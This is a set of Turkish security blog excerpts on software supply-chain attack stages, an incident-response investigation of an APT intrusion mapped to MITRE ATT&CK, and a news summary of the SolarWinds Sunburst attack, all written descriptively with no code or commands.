Derleme Ortamının Yapılandırılması

Buradaki güvenlik konuları elbette giriş bilgilerinin aktarılmasıyla ilgilidir. Şifrelenmemiş giriş bilgilerinin ve depolarının derleme varlıklar halinde aktarılması riski vardır. Esas olarak, bazı yapılandırma ön koşulları, bir derlemeden sonra genellikle geride bırakılacak olan hassas bilgileri içerir.

Derleme 

Bu adımda asıl kaynak kod hedeflenen ikili formda derlenir. Solar Winds ve CCleaner vakalarında bu aşamada saldırılar olduğunu gördük. Saldırganın bu aşamada saldırı düzenlemesinin mantıklı nedenleri vardır. Birincisi, bu aşama tedarik zincirindeki son adımlardan biri olduğu için sonrasında çok fazla doğrulama olmayacaktır. İkincisi, üretilen yürütülebilir ikililer günümüzde genellikle dijital olarak imzalanır. Bu da kodun imzalanmasından sonraki kod modifikasyonlarının tamamı için geçerli bir dijital imza mümkün olmayacağı anlamına gelir. İkilinin sağlaması eşleşecektir ve özel bir anahtarla şifrelendiği için bu bilgi olmadan geçerli bir sağlama üretilmesi mümkün olmayacaktır. Bu nedenle derleme süreci, tedarik zinciri saldırıları için uygun bir hedeftir. Bununla birlikte, yazılımların hepsi dijital bir imza ile gönderilmez. 

Dijital imzadan söz ederken, sertifikanın özel anahtarını gizli tutma ihtiyacını vurgulamamız gerekir. Bu özel anahtarın ele geçirilmesi, saldırganların istedikleri yazılımı söz konusu sertifikayla dijital olarak imzalayabilecekleri anlamına gelir ve bu nedenle bu anahtar iptal edilmelidir.

Devreye Alma veya Ürün Teslimatı

Zincirin CI/CD hattına ekleyebileceğimiz son parçası devreye almadır. Öncelikle, devreye alma süreci CI/CD yazılımında belirlenebilir ve başarılı bir derleme veya test üzerine tetiklenebilir. Bu yüzden, mimari bilgilere giriş bilgileri ve diğer hassas bilgilerle birlikte buradan ulaşılabilir. Bu nedenle, düzgün şekilde yönetilmeleri gereklidir.

Bir saldırgan için en kolay yol yazılım ürününü tamamıyla değiştirmektir. Ayrıca, kötü amaçlı kodlar enjekte edilebilir ve bu, belirli uygulamalar için uygundur (dijital olarak imzalanmaz). Örneğin, WordPress tabanlı web sitelerindekötü amaçlı kod parçalarının bir güvenlik açığından veya güvenlik zayıflığından faydalanılarak eklendiği kod enjeksiyonu saldırılarıyla karşılaşabiliriz. 

Yürütülebilir bir ikili kod enjeksiyonu da mümkündür, ancak bu tür bir saldırı derlenen ikiliye ve saldırganın becerilerine bağlıdır. Ayrıca ikili dijital olarak imzalanırsa saldırı kolaylıkla keşfedilebilir ve etkili değildir. Basitçe ikililerin değiştirilmesi saldırganlar için daha kolaydır. Bununla birlikte, ikilinin depolandığı teslimat sunucusunun (kullanıcıların asıl yazılım ürünlerini indirmelerine olanak tanıyan sunucular) hack’lenmesi kolay bir iş değildir ve önemli kaynaklar gerektirir. Bunun yerine; kimlik avı, dolandırıcılık kampanyaları veya DNS sahtekarlığı saldırıları gibi taktikler kullanılmakta ve bilinen yazılım markalarının (hatta güvenlik tedarikçilerinin) kötü amaçlı veya aldatıcı yazılım yüklerinden istifade edilmektedir.

Sonuç

Bu blog yazısı, tedarik zinciri güvenliğine ilişkin temel konuları ana hatlarıyla açıklar. Bu tür saldırıların neden olduğu sorunlar bir yazıda anlatılamayacak kadar karmaşıktır. Yıllık tahminlerimizde daha önce bahsettiğimiz gibi kuruluşların 2021 yılının sonuna kadar iş yüklerinin çoğunu bulutta çalıştırmaya başlamış olacakları tahmin ediliyor. Bu nedenle bu konunun bir an önce ele alınması gerekiyor. Karşılaşılan sağlık krizi sonucunda birçok kuruluş güvenlik endişelerinin kapsamını tam olarak anlamadan yeni yazılımları aceleyle benimsiyor.

Belirlenen tedarik zinciri saldırılarıyla ilgili daha fazla bilgi edinmek için bu GitHub sayfasını ziyaret edin. 

Sanallaştırma ve BulutBulut BilişimGüvenlik Açıkları konularında yayınlanmıştır

ATPX’İ BULMA: MITRE TTP’LERİ ARACILIĞI İLE SALDIRILARI İLİŞKİLENDİRME

Güvenlik ekipleri ve araştırmacılar, siber güvenlik alanındaki en güncel bulguları öğrenmek için kamuya açık olarak sunulan araç, rutin ve davranış analizlerine bel bağlıyor. Yayınlanan bilgiler, gelişmiş sürekli tehditlere (APT’ler) karşı savunma araçlarının kurulumu ve ilgili sektörlerde meydana gelmesi olası saldırıların önlenmesi için bilinen taktik, teknik ve prosedürlere (TTP’ler) referans oluyor.

Bununla birlikte, bir saldırıya karşı savunma yollarını teorik olarak bilmekle bunları ilk elden deneyimlemek arasında çok büyük fark var. Yayınlanan rutinler, araçlar ve davranışlar, hedef alınan her şirket veya sektör için suç gruplarının uygulamalarından farklı olabilir. Dahası, bu fark büyük ölçüde güvenliği ihlal edilen şirketlerin araştırılan ortamına dayanır. Araştırmaya ve giriş yollarına ayrılan çabanın ve kaynakların miktarı göz önünde bulundurulduğunda, bu tehdit oyuncularının her defasında farklı bir yöntem bulacağı, gözlem yaparken gizli kalacakları, komutları gizlice gönderip bilgi alacakları, trafiklerini maskeleyecekleri ve mümkün olduğunca uzun bir süre daha çok sayıda cihaza bulaşacakları kesindir. İşte bu noktada araştırmacılar, analistler ve teknolojik çözümler devreye giriyor.

Sunucularından birinde şüpheli bir komuta kontrol (C&C) trafiği tespit eden bir güvenlik ekibi, şirketin sistemlerindeki bu trafiği incelememiz ve analiz etmemiz için bizi aradı. Disk ve bellek görüntüleri dahil olmak üzere geri bildirim ve etkinlik günlüklerini incelememiz için sınırlı sayıda makineye ve veriye erişimimiz sağlandı. Ancak, bir uç nokta tespit ve yanıt (EDR) çözümü veya bir katmanlar arası tespit ve yanıt (XDR) çözümü olmadan, muhtemelen erişilemeyen sistemin ortamında çalışan ve keşfedilmemiş tüm örnekleri ve araçları toplamanın yolu yoktu. Bu durum, incelemeyi yapan güvenlik ekiplerinin tam bir harita çıkarıp saldırının niteliklerini görmesini engelledi.

Kapsam ve Ön Analiz

Günlüklerin ilk analizine göre, toplam 62 makineye virüs bulaştı. Bunlardan 10’u sunucu, 13’ü dosya kazıma ve veri sızdırma becerisi olan ikililere sahip makineler, 22’si arka kapı muhafazası olan makinelerken, geri kalanı ise saldırıda istismar edilen kötü niyetli ikililerin yüklenmesini sağlayan diğer araçları ve normal uygulamaları barındırıyordu.

Arka kapı saldırganın cmd.exe kullanarak komutları çalıştırmasına izin verir. Kullanıcı hesaplarını ele geçirmek için Mimikatz gibi uygulamalar kullanıldı. Virüs bulaştırılacak diğer makinelerin bulunması için kullanılan ağ tarama araçları, arka kapının diğer araçları uzaktan bırakmasına olanak tanıyan kötü niyetli bir ağa dahil edildi. Uzaktan bırakılan yürütülebilir dosyanın çalıştırılması için zamanlanmış bir görev oluşturuldu ya da bir wmic süreç oluştur komutu kullanıldı. Birçok durumda arka kapı kopyaları bırakılırken, bırakılan ve yürütülen araçlar da çeşitliydi.

Saldırganlar çoğunlukla PDF ve Microsoft Office dosyaları gibi belge dosyalarının peşindeydi. Ayrıca, ikililerin zaman damgalarına ve virüsün bulaşma yaygınlığına bakıldığında, bu saldırıların birkaç yıldır devam ettiği söylenebilir. MITRE ATT&CK ile bulduğumuz rutinleri ve araçları karşılaştırdığımızda, gözlemlenen tekniklerin hem APT32 hem de APT3 ile eşleştiğini, ancak birkaç tekniğin farklı olduğunu ve ilişkilendirilemediğini gördük.

Analiz ve Nitelendirme

Tekniklerin çeşitliliğini nedeniyle, en çok sayıda kuruluma sahip olan beş uç nokta hedefinden faydalanarak rutinlerin kullandığı ve bağlandığı araçları ve ilişki kümelerini analiz ettik. Altı tür veri sızdırma aracı, altı arka kapı ve çeşitli amaçlarla kullanılan beş farklı araç tespit ettik. Bu araçların çoğu, MySQL arka uç veritabanına sahip belge yönetimi sistemi gibi şirketin barındırdığı çeşitli sistemlerden ve yazılımlardan istifade etti. Ayrıca, araçları kötü amaçlı rutinlere bağlayan altı ilişki kümesi ve APT gruplarının ve alt gruplarının önceden belgelenen girişimleriyle eşleştirilebilecek olan dört izinsiz giriş seti bulduk. Bu araçları ve ilişkileri “Finding APTX: Attributing Attacks viaMITRE TTPs” başlıklı makalemizde ayrıntılarıyla anlatıyoruz.

Saldırıyı yaptığını düşündüğümüz gruplar, çeşitli araçlar kullanıyor ve daha önce diğer araştırmacıların yayınladığı diğer gruplarla güçlü bağlantıları bulunuyor. Araçların paketlenme biçimi veya “açıklayıcılığı” arasındaki tezatlara bakıldığında yazı stillerinin de çok değişiklik gösterdiği görülüyor. Ayrıca, her bir izinsiz giriş setindeki veri sızdırma süreçlerinde görülen yedekler, hedefin sürekli bilgi çalma, veri güncellemeleri ve sistemde gizli kalarak uzun süre mevcudiyet olduğu düşünüldüğünde hiç de şaşırtıcı değil.

Her ne kadar bir talihsizlik olsa da mağdur kuruluşlar, referans olarak kullanabilecekleri ihlal göstergelerini (IOC’ler) belirleme konusunda benzersiz bir konuma sahipler. Günümüzde mevcut teknoloji çözümleri (EDR ve XDR gibi) göz önünde bulundurulduğunda, tanımlanmayan günlükler, izinsiz girişin eksiksiz bir haritasının oluşturulması için gereken eksik bağlantıları kanıtlayabilir ve tespit edebilir.

Bu çözümler, saldırının nasıl meydana geldiğini tanımlamak ve bu etkinlikleri yeniden oluşturmak için ihtiyaç duyulan zamanı kısaltabilir. Yine de güvenlik ve inceleme ekiplerinin işbirliği, özellikle saldırıdan sorumlu grupların bulunması bakımından tehditlerin tanımlanmasında, önlenmesinde ve azaltılmasında önemli bir rol oynar. Süreç çok açık olmasa da kullanılan tekniklerin ve araçların belirlenmesi, etkinlikler ve araçlar arasındaki ilişki belirlendiğinde güvenlik ekiplerinin tüm şirket yapısını savunmalarını sağlayabilir.

İncelememizin tüm teknik ayrıntılarını ve analizlerini okumak için “Finding APTX: Attributing Attacks via Mitre TTPs” başlıklı makalemizi indirin.

Yönetimli Tespit ve MüdahaleAraştırmaGelişmiş ve Israrlı TehditlerSiber SuçSiber GüvenlikKurumsalOlay yanıtıMDRMITRE ATT&CKyazılarında yayınlanmıştır.

Yazanlar: Lenart Bermejo (Tehdit Mühendisi), Gilbert Sison(Siber Tehdit Avlama Teknik Yöneticisi) ve Buddy Tancio(Olay Yanıtı Analisti)

2020 yılında ABD’yi vuran siber saldırı: Sunburst

Geçtiğimiz günlerde, ABD’de 3 binden fazla çalışanı olan ve yaklaşık bir milyar dolarlık yıllık gelire sahip global yazılım şirketi SolarWinds’ın uğradığı geniş kapsamlı siber saldırı, tüm siber güvenlik camiasında büyük ses getirdi. Dünya çapında binlerce şirkete ve devlet kurumuna hizmet veren Solarwinds’a yapılan saldırı, saldırganların şirketin en popüler ürünlerinden Orion adlı IT yönetim ve izleme yazılımının güvenlik açığından faydalanarak ürüne Sunburst isimli zararlı yazılımı yerleştirmesiyle başladı. Böylece Orion’u kullanan binlerce kurum, ürünü güncelledikleri anda yüklenen zararlı yazılımı sistemlerine yüklemiş oldular.

“Tedarik Zinciri Saldırısı” olarak nitelendiriliyor

SolarWinds’ın toplam 300 binden fazla müşterisinin, aralarında devlet kurumlarının da bulunduğu 33 bine yakını Orion ürününü kullanıyor. Şirket tarafından yapılan açıklamada, Solarwinds’ın IT yönetim ve izleme ürünü Orion’u güncelleyen 18 bin müşterisinin bu saldırıdan etkilendiği belirtildi. Üretici firmanın tek bir ürününe yerleştirilen zararlı yazılımla bu ürünü kullanan tüm müşterilerin sistemlerine sızıldığı bu tür saldırılar tedarik zinciri (supply chain) saldırısı olarak adlandırılıyor. Solarwinds’ın Orion ürününe yapılan bu saldırı da binlerce kurumu etkileyen bir saldırı olması nedeniyle “Tedarik Zinciri Saldırısı” olarak lanse edildi.

Okumaya devam et